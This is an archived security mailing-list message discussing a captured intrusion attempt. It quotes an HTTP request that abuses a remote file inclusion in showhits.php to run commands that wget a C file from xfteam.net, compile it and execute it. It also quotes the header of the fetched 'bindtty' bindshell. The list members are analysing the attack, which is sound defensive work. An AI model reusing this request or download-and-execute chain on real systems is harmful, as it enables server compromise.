lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <3FC1DDA5.2020306@insecure.ws> From: kang at insecure.ws (kang@...ecure.ws) Subject: http://xfteam.net/fedor.c - Anyone seen this before?? Dan wrote: >Is it just me or is xfteam.net not resolving anyway? > > > xfteam.net has address 69.56.243.146 >Orignal HTTP request: >GET /logjam/showhits.php? >rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f > >Breaking this down we get(twice): >uname -a >cd /tmp >wget http://xfteam.net/fedor.c >gcc -o f fedor.c >../f > > > /* bindtty - like bindshell, but with tty Features: - it can handle any number of clients - allocates tty for each session - no using termios.h/tty.h: compiles on most of gccs - linux specific ;( by sd <sd@...cz> */